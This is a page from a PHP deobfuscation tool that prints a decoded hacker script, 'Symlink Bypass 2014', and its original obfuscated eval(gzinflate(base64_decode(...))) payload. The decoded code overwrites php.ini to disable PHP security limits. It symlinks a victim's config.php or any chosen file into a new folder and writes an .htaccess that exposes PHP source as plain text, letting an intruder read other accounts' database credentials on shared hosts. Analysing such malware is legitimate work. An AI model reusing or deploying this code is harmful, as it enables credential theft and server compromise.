Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61..

Decoded Output download

?><html xmlns="http://www.w3.org/1999/xhtml">

<head>
<title>Bypass Symlink 2014</title><link rel="shortcut icon" href="http://www.iconj.com/ico/2/j/2j62fbaa2w.ico" type="image/x-icon" />
<link href="http://fonts.googleapis.com/css?family=Ubuntu&effect=fire-animation" rel="stylesheet" type="text/css">
<style type="text/css">
  html,body { margin: 0; padding: 0; outline: 0; }
a{ font-size: 12px; }
body { direction: ltr;  background:
url("http://i.imgur.com/hg21xZ9.png") repeat , 
url("http://www7.0zz0.com/2014/05/28/03/906797114.jpg") no-repeat center top,top left,top right; background-color:#151515; color: rgb(0, 153, 0); text-align: center } input,textarea,select{ font-weight: bold; color: #000000; }
input,textarea,select:hover{ box-shadow: 0px 0px 4px #00cc00; }
.hedr { font-family: Tahoma, Arial, sans-serif  ;  font-size: 22px; } 
.cont a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif  ; font-size: 16px; text-shadow: 0px 0px 3px ; }
.cont a:hover{ color: #FF0000 ;  text-shadow:0px 0px 3px #ff0000 ; }
.cone a{ text-decoration: none; color:rgb(0, 153, 0); font-family: Tahoma, Arial, sans-serif  ; font-size: 12px; text-shadow: 0px 0px 3px ; }
.cone a:hover{ color: #FF0000 ; text-shadow:0px 0px 3px #ff0000 ; }
.tmp tr td{ border: solid 1px #006600; padding: 2px ; font-size: 13px; }
.tmp tr td a { text-decoration: none; }
.foter{ font-size: 9pt; color: #006600 ; text-align: center }
.tmp tr td:hover{ box-shadow: 0px 0px 4px #00cc00; }
.fot{ font-family:Tahoma, Arial, sans-serif; color: #009900 ; font-size: 11pt; }
.for a : hover{ color: #FF0000 ; text-shadow: 0px 0px 1px #FF0000; }
.ir { color: #FF0000; }
.tul { face:Tahoma, Geneva, sans-serif; font-size: 7pt; }
#menu a{ padding: 1px; border: 0px solid green; color: green; text-decoration: none;color: #009900; font-weight: bold; font-family: Tahoma, Geneva, sans-serif; font-size:12px; }
#menu a:hover{ border: 0px solid red; color: red; }

</style>

</head>

<?php

// Extract php.ini //

$fp = fopen("php.ini","w+");
fwrite($fp,"Safe_mode = OFF
Safe_mode_gid = OFF
Disable_Functions = NONE
Open_basedir = OFF
suhosin.executor.func.blacklist = NONE ");



echo '<br><b class="cont" align="center"><b class="font-effect-fire-animation" style=font-family:Ubuntu;font-size:25px;color:green;>Symlink Bypass 2014 Coded By Mauritania Attacker</b></b><br><p align="center">';
echo'
<form method="post">
<input type="text" name="file" value="/home/user/public_html/config.php" size="60"/><br /><br />
<input type="text" name="ghostfile" value="output.txt" size="60"/><br /><br />
<input type="submit" value="Bypass" name="symlink" /> <br /><br />





</form>
';
echo '<div class="tul"><b>PHP VERSION:</b> <font color="009900" face="shell, Geneva, sans-serif" style="font-size: 8pt">';echo phpversion();

$fichier = $_POST['file'];
$ghostfile = $_POST['ghostfile'];
$symlink = $_POST['symlink'];

if ($symlink)
{


 $dir = "mauritania";
                    if(file_exists($dir)) {
                            echo "<br><font color='red'>[+] mauritania Folder Already Exist _ are you Drunk XD !!!</font><br />
";
                    } else {
                            @mkdir($dir); {
                                    echo "<br><font color='red'>\!/ mauritania Folder Created ^_^ \!/</font><br />
";
								    echo "<br><font color='red'>\!/ $ghostfile Retrieved Successfully ^_^ \!/</font><br />
";

                    } }

// Extract Priv8 htaccess File //					
$priv9  = "#Priv9 htaccess By Mauritania Attacker
OPTIONS Indexes FollowSymLinks SymLinksIfOwnerMatch Includes IncludesNOEXEC ExecCGI
DirectoryIndex $ghostfile
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddType text/html .shtml
AddType txt .php
Options All
Options All
";
$f =@fopen ('mauritania/.htaccess','w');
@fwrite($f , $priv9);

@symlink("$fichier","mauritania/$ghostfile");

echo '<br /><a target="_blank" href="mauritania/" >'.$ghostfile.'</a>';

}
echo"<h3>
    GreetZ To : AnonGhost - ZHC - Mauritania HaCker Team - 3xp1r3 Cyber Army - Robot Pirates - X-Blackerz INC. - Pak Cyber Pyrates - iMHATiMi.ORG</h3>
	";
	
echo"Coder: Mauritania Attacker";	

	
	
?>

Did this file decode correctly?

Original Code

	

    <?php
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lZzJjsNIcobvBvwOjUYf7MtAZG4SGn4TXrQVfDAwi41BP77F4PdFssrGAHMQqlSikpmx/PHHwvrtj/7nv/z99csvf/qPX37d/hiXz2vd/ujt8xrbH+1rvt8/68/Pa/m8yvG39fp5fT5fP9et78/rfvwen+1/fx4/2+fn+Fxb+ufVTu/H8bdvny/f39dyev9Zq1x/XD++r1d/fL/cfqzXfnze/8H9fu5n32/9B+f5//b38/w/1/t5v/N65cf+yo/7f66tP+X3j/bX/+/9/qnvc771s+/x0XX7fN4/P+vnb/Xzvf7RfVunjQzP//l81GON/rGTvv9tHLqon/f161h3//7Qvl6f38fx2q/RBuv92PN+//3e+3r777ue92t2me73qYM1+e7+ivvc+P5y7KuVw8YrPzs2udt6Y/3m3vpxTbsc52nsIezuzhqfa9YHclsOf9jPsF+zcs59b/se9rX92/6dkPGNvxV8sM71yuV47XuOPZzW7Tf+hmx2PYQsP5/3fuwv7GfXxe1Yb5Tjs5Dr9VivP4716g39jeN+cY9yyLAi4/1+sS/sZIAFu2z2dfY1Y63Hse/6RE8PbO+FPL4mbnRt7YrckWdgEz4wsLd9rcLe6kkGrXHWG3aCnPf7h0wvyGY97L0ix/39fm3oceH6/TyNz67HPcJeTva8y6lyj11WRTvc116R93L4S+zjxWcv/GQ57D3Oybkatj/Qw66rfa39mnYDF/px1rDt9Vhjf+33ivujW++x29JANrttxlmXQx77XnZ73uUY91w4LxgROqsnf8FG4wzrcf6Cj4VPX/lZOPv1ZKsvvosthE/dsNVl+rvvwz7fxzn2dfa1973ta+8/d1svfu9+rLVf0/q0t/1v8d1+6C185wYG7/eqM/7tst/fN2115X1lf8g41hqHbuKzhr11XnfOgU/t8ot1FvaFb+4y1Vfiuj7f77oJm/H9gg0sx/fEv5ApuBQ4Udj7AtbewY2VfT0P+e12E34pphds5rRO7GcF3+/HdXWZ+g3bGYdtxXrYb2Dvjddysl98KWwHXy/YYdhF5bWAxWBhYMgDLGvcGzvar439L2DX7ThH7J89hm0ux71234jztGPN/byxzzf+U8Ciii6Rm7YT57tz73XacgGbKudzv4Gt2Gr4xCA2NvwWX484Oo5XJYbsMm/Y2WBvVZs/XRM6WbDtBR+o2Kf3ehBTnxN/m3bQ0MGF98T2sNkrOA62xDmuYCD2G7KtE2dCfsSwwJhlxoGqb9ywiQt6K2DSDfy+4ecF/bCXWPt2YHfIdUGXFf025N/RO9c3cDk4CvYSvEa/1zbgsnHuRly7YmN37BKcjDOCceEbjf0PdLCC1+X4rJ5wNLAH2TZlJbf5wi7L/K4+3o1fy8R5+UtDF+0+8Xbfq7oOnWGHuz10eelt6j7OdeW7fud9yDPWkT+8wcnXiROe8Dd0ra9eOaO2tHIWfFN8HHCwiLF9S+424L/hP2BU7P/O95Dzfn3rJ4x4Ycf3E3/THolTgYcPMGuc4ssdm1Qfb95rq4W43djbMvfZ4U65LrgdflyxCfx012cDA0PmxhLO5NmKPq7vPfA3+ELEjwVsMz7Dw2P/DzCce4f93cGFAu5jz3L43k+87us4r3E0Yx02EnIwRip/OL/6Snu5zPhQrlPvhRgX9674r/u6I6MTr+/EA/37bGcNv1ix8wrGhryIfWF75iPExi7HFhvrPL+xr4OhHXl07L3DVQY5y0DOcR7iTyVvCD9uxHLOYezu7aR/Yxk6j/cnvQx8IHi//tqItV+HjQQHwKd3+xxwwODMK5gA1yz+7cHeGnmIe3jjt2CSsW3IC762jO1Dfx/4Hfy3odtmvAa3zL3q2f7hWOUyZd7BggZOVDhqlbuA4wPO1fHJ0MsVO6xzj6Hb+7HvsIHHjNGhE/A1YsmKf8H7Cj4sT+5y7ethP5EXrBOHKnE/uJd2bu5J/A/7eiIf9hn3/5pxp5KnN3QQ2HE/+e6A+5aJt8PfuW+s304c4Q1vqcfvkcvWQ68DPj6uk4PIAY7c9Nff//Vffvvjr//9n+N/LCw1hLpCPhqJWwQRgC+A4Ot4RRDFmKNAUVHI7WRgt0MhDQLUz6SBa1acKJR4Zz0CTSSxy5aJzBCgrgChIMy6JrG7oXaSvErwEXAsXkju4/4kdmcnHpIQlDBM5Fg3ABuSUJXFfSa6kUxdJjEJ0DBRvGDQdwjRgvJQUBbKACzPXiDlYegEEAshKjq+j/OYbEewf2FMBsMTMa06ZpmEtZJ8Dc9hEMfhO4AZgU6CZlJA4asDIsOkXeAGrD1bEMQXDgC56QIORH6VpJtY9GlPAUA3ABs7MOiazFRIbH3MJCb2B8mKgo9JD0S7SBIJmKNMUCmQvRUwsYhRISkVEh57Wk7B500QXibhDlDr8/cCUR5nUtUApIp+XtjdsmWxQ5IW1zzmmYrJbz8BrUWBry2LGRLHop3jL4V9mqRGgCgEIvRUJBH4VeP83aABOSsAdAEkK1iSoA1JCruFYJZl+r6J6CBYhszHDGwdnVUKERaYK7bb2gzgjSBZwLsKcQq/AVjbMj8LO8IPY02S2iZBI3BlUtUn9oSODUaFMxds6gI2rVsWWgoFnY5/dXysk/RWsWudSZC+HeT/fsiiSyKXScxcL4iQxZrnxGQTCosEgZUdW76QNLwgHwW8FRsgH6FLSFJgl8mnwZ0g1yHo2mIn0FscjMAI1gapo9AQSdMdv3oRa9BfxKZxnP+cRIfNVYjnCgFx3WX6sQSrm/iTEGoDkUSafIN7oSsKChFH+GyXZxunmLCCS1+HjeQe3ye9v2YgL64JBjSx6MKaJyJZl6mXJFvIs5H8dIo+GZshukOCS4JRwQiL5h2iaSwL330cZwwi6N7F5K9TEazNAniHJ2gjpU5fsVgeHEOSCw+Is9VD5wMfzwYN8bOh215POKfdrsQeYnbDtkb/zhc6JHQl3hXt4Mn39C1wvErU2Mt+XcQZMDr4QONsJm8dP1rQg8TxOfegbYhdseYX+r1OLLFoK5aa2FkMM8GPRK4dey8mvCdyKgmvEnZ9Uiw2UVymrcnjimt8bVn0lDwP/KzLEfGzLs7Bs0I2nft19sC9Q3+dM53tArLc+b6F0UGhtMonn+zZoqc8644OG3JYtyxQmrBk8YHzVbA+9NAmV7TIb1OlYFOS/fDxcsg/CDq4HFxwTJuwwVbWE95g2yZMFokjueB+Qxm90DFcQbxWPvqsa2WxTBtfwavl+xpV7i330qYvM2foxM4s8BPLyyn+1BOPkR/2djr7fcsGToc7hQzf3AO/7ST6Dfy1YWYMqRQIIjkbMw4FLnbibJ88MHwJ2Q45LVhS4FxF3g6+Ve1WjOC7kbzT3LHJWTiTvKheT/Glb1lgKRa+2lw//JJ9V32dwkIHL4c8+nmsJ6cJDuKeSRQD/+VGFjD43DwkPkdHoYMb9gFPHepAn7xO2+nu9wkePZCXibZ8WG4Avwi8WbYs7hSwuZGT2OCLc7/Bwftx9rDZN7FDn4GrJ3Y+wVt0MdBRxAZtvU1cWfHF9TF1ZxOxk2fEOdtJdi+usxCmjOE8DZ/pNAuCv5lzm7QbA9pxfeyDnKzDOwO7x8T0Znz7mvGvy1sXdP7asgGZxXPyAwvHcQ2cr3E/46v7GRTuBvZV71M/gVvwUvmKRewmLhozwJgqBouJ+vEy9aqtFvOOZZuNZv0JuRRyOosqFvcacu/im5wbHa5wdPPzKCCDR4ld4EvDboxfA14VOAQ2ZSMSW7YhXCk6N2Jpl9PJY4y3T/xYHALD00eJoZX4XcDeSiM1zoqetY0ohn9tWSzMYtFlxqABx7GJEGc2/zdnIf8q14kf7XIUll5/KY+3haXs5vY5aVAxQCcMrBBbiAkDohgRxOE+DxYEVMNnXbtbAb4E2wHRGyRpdhgkXPs9BqBtl7hyv2ERCeM0GAVBMwHge1aN7ZaFobwBW6rTdrEayY4B1KqdgcdgEoql2+YEx2hTTtlpNxEzQAPGVjgrpCoCpGfqW3ZEBcIoNvieaQQrrdnREPiX2fVOUFPugKRkoF0mKdPxB1XrWEsScDm+H3JEvkHAIU0D0h9ng8wFSLzRpUnEbQaNuE4CLgnmHhlQX7OA09GjE0pO+TQIQLucnOdBQJdgIEcTqZxaeW+ZyGqDUVAUFLGnAOxlOqCdx2bSAKhUQD984DLBSaC0g60NRdBbJ1B2dag8DFicOXwEAuN6BSJnxd4AaMesERRCt9ctk7CQx2tLUml3uOrf9xkI7QwaUIddF4Cs4YuZGBkIIQsWPBqJuLo2eAhoYRcnAmwCkt2pO/6JjRXsxIkAOzQd4Gz4ilNkkjML4Tkp8AAXDI5fx9rF4sv7BKz6Ht/1upDFetzXgDluU+52LLSbdiJ0xeIWAT98zWLIZYJ+J/GqdIXO3SATp/Dp+5R7+MbthF2cNbAbTOkEinouVjT0UiaxDn2avHstNmnhrInvTsSt0z9iL8hFctRPiVUE45VAvU6Snx0vEqhBYt36Ca+MBezxPAVnsTmno8SEMb+Tk4pidEWPkCM7ioGF4KiYY/GhgM9F0sjfstBKXBN7Q3bsXTLaIbThy/h4yIV17LZ2C999m51V1rC4YcPAbpWxrOrnkCWbNNVCIbZcwci4pwkd9wybogBR0ZkdeCe4CvoPX67bTHBMyLAxJ1KjWHs9fpf8tDH9q7Z5TSM2S2ibCUiBFN2QL/gVdknBo5s8vo81u+cjebUZ5WRZhxOZ+IetaO/YdGszUdDWg8h/bbMQc5nYXom1Xb8lpvTXjKEhMzupdcaibJxBvAdk1OnVOBuJoZMVqdOvwy60sQ7ncAIuJxoe2La+QZJXiFc5zUoiZ2G74Pcmw4GJt8nBBnHWqSEbB8EVTEwg9pl4vLH/tmWTxyK/k5tVrOasTgE2iXufMd+uuzhm8asu36dDXU+bjn3oJ+pwOc5pIh3xEQ6TEyQm+xS/KjwpJyVJJJRfJybIfxv+kJO/ymIBT01cypYTIDZ6I0ZZrCBWOZkSsbNtc+LuORuk8vxKIp4FQjj7gOs0ErwBfw7fIrFr7MvJ0fCTdfKisEWSq/DjU8zq4H8UT0hyf06r2EzQRgvYbGOjym2QrRO2NseVY3WPyCwbe2LVA3tZ5nki0YW/yQeyeUjMySLCc8tiZINXBwYTo5zUCV94cI91S/7sNa4Z2Aq+DXysLzNW19vEY5tQcuQsEpYtE3YLwCbqwTONsWXLwkSsj76113H2I+KKzXsn9C3ojRMuyXtsKCSfOifeYinY41SqRbmU/3vL4nyFVw44TnBF8pmcNIJrVJsC1y0LBMZUp08aOJO4fwW3++Q85oMNHtPAWp8WSR4j1sHpO5jROIN4rP0U7GEY+4nv5ifmG7Gfx5SX03DmtfUx8WsQrxt5hvEiJz7VMZxDXpITunA7p8ec1pc/OJktxmS+3rdsBjooETxPGT5Oa4q75HtO1BufbB5bwBlwXGNpxKZlxuOcDlum7WTDlZiWRSXyh309m83J2yjMfJsWL8gNbLUpauG+lelDwe+VB/qxgCce58AN+pCTVuzO4mX4Z92yiB2yNW+xyUJOWuBOgY0V7NIfzNlf22wygqlyqdU8FX+Igued/UV+cxSWnuOvf/7beWLJbquPjBQTDjbSCRSOhDoGrJPlIwF0SZqGKUm54zwEL7ulQeJeExgjcbDKbjJ4m593EkdH+ATLQTCx4j8oKki27XQ2gz0Jtt28QpJqQpxddQhRyMaEWoKrgXG+IIsSBuSTyQVJ4SAI2dlJsME4xgk4w2EIhtltuUwDtxNmt3EQIH2MqbYpp9gfRGtAAiTYZ4cy8S2QgtTNc8sJh4pDmFQW9BOJFslIFhggWgWCXAC1gp4rASCLOU8cGzsMw2Y/EkknyCzoWPCpnDELQhCUsCmTKqvLyMQx4GYiQeJYAND4/go4tC0TlSrYSOieU0+D8cRBQtepIOdjTuoef8hpmuuWY56V4oWV+LRjdFSxGdfNiYvXlo8sOAFiJ8eKvqO5IRMJ1XL63mvLRwG6gfux5USawbAuk/AmCYPwZXfHzpLEh4RX2+4n4hsykHgDxFHM6icZkrA0Cp1ZxCzgwXWSys4eDZZZIAELhskEAcDHQDKxN1iVLSfnOsSkrNu3INzRnY9hfetEnUhYJhPLtKUgPeuWXRanBbLwe5JnwVbD3p7H3ga+n+ScBEZCHXKDhFvkGsjR5KeI4wMbRk/h08s2p3YoJoWu6yRTEqfw9cuWj8E5vuskQBZbly3Hadtl7l+52+mrkgwKj9WCBPoSoy3QJ1kz6I4ZUyRw+Sj1ytrrNomNuFqnHBok0wKx49EmyedpgkggricZv7Zv0xoWSXwc0gJfXSbGNeRbiUlOXHYwSh/V1+xaD2zPRoI2HzJmP0FqwCSLuxbNM4nH5n2MrhLXnZBzX13sfh/n6JJAk0/82IKs8dppC31evw8b4bMGtolBchHt2655JuF9y0dtJdD5qNuLe3FNOzW41PvABuxiB6atEyM8X8hs2ZK0x3mJcaOd4up7YlU+RgOOZDMIOUlGC/5oHC7EUzuGjRjghLGPegx0VinSB4l2IlaOdj3hkJOHy/x++KLx3zNQ2PDxVh+p8nGFyhn1r5y8IaG1WBk+9YDDUNQoyNrHDsNvSQztGGcB575lU6WBZzlhC2fqxGET5obNWXjJx85vrCn2L1s+4pC+d5tFnMDWeopDFFXafWJXNi7r8b3VJHk5vlvQqcl2YY1CA6CSvJhEhr7kle9tPpIJH0tebHL12LJA4WcNvpqFZmJiPvqygOfuR34jr1u3fJyxyi3gRNmQMQ8gHtuQ8jHUsBcK7cEpSHwGvpzNagtMBb8DW6qFX4o4wdHOcZfCTv4bhHMhzoLtbeo2Gzfi133yEWNHTiLeJo/wsXanrWwmNO6rTTmxlA33J/xh2WYhSH5LMaZQxE7MeU3dWUyy0JJTqXBdC/UDrmQhSH5kbOzw0EFDtBpf5ZVwifAn7YQCiY8KRgMCzMnHO5/TB2x8ZuF63bK5ob6zuYucxAq5bhFrwZ98RLtss7lnTBZLsU+fpslY3qdvB6dGh05XhT/W2Wxs4LRFQpstPnKdj54/T/y5bnNa9YG9LltOwfjvB4IDmRMbJ7+2nCw3l5CLRAxCJlWsEevvkw/ZjM1CPPEz8bJu2dzxEb44++PEd8HZbOItWz5e5VMfEVv69D95pHZTT/lFO2FioXBawcbgmHLAts2nlE6Fk8QfsDP8B+4WcQl55OQtsc7HfuUf4dfoeJCvpG9iW/IVm/MWshr8O+QhThvLX8jNXB1btIBYLeZgB/LG5NDymjc24JqPLSfavCYL/vJ4eVmZuZXDFQ6vFOor+7+t+favbG7/xPty3PP8b43itcvi8evv77/f/+vffuPfKf3pF59/2387Bpb236LC9O+//y8='\x29\x29\x29\x3B","");
    ?>

Function Calls

gzinflate 13
ddlcqb59653 1
dqaqxw59651 1
duzhsp59652 1
preg_replace 10
base64_decode 13

Variables

$a base64_decode
$b gzinflate
$str vVfrbts4Fv5dA36HUyVYOxhbsp02ra9tJk3SANs4aLKLonMxaImS2FIXUFRs..
$x6opvd preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x..
$xc7qor ZM6gP2ibtiSnswQhpTepVXM15jRdLQJYMRavhya/IRadJRb4PrspEystjuYT..
$xdp3be Fxv/KMj6Mejm+Kc1fZjI/7eXvcHqjLtSyAMHIdKucFwAfpyeHrjl2XsF5vJe..
$xqsh7t Zh+wY3UqQioozDRFTliqNIbUQaY9qN+e2ZRO4GqO3rdhsmeqYK0yc5KjHWqc..

Stats

MD5 34c8f6e6c17ca24cdeaa35942ff5c73f
Eval Count 24
Decode Time 140 ms